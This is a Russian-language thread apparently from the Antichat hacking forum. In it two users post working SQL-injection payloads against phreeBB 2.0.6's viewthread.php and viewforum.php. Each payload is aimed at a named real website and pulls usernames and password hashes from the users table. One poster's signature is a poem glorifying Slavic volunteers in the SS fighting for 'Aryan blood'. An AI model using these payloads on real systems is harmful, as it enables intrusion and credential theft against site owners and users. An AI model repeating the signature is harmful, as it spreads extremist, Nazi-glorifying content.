27.08.2009, 09:30
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
phreeBB 2.0.6
Не путать с phpBB!
SQL-Inj
Продукт: phreeBB
Версия: 2.0.6
Уязвимый скрипт: viewthread.php
PHP код:
$result = mysql_query("SELECT * FROM viewForums WHERE view=$id");
$msgData = mysql_fetch_array($result);
Эксплойт:
Код:
-1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
Пример:
Код:
http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
13.11.2009, 12:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
А че дальше то недобил Дедуль)))))
чет случайно наткнулся)))У меня сорцов нету , не смог ни где скачать)((((((
Файл : viewforum.php
exploit :
Код:
-1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--
Пример:
Код:
http://ilcuckold.altervista.org/forum/viewforum.php?id=-1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
Последний раз редактировалось HAXTA4OK; 13.11.2009 в 12:35..
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
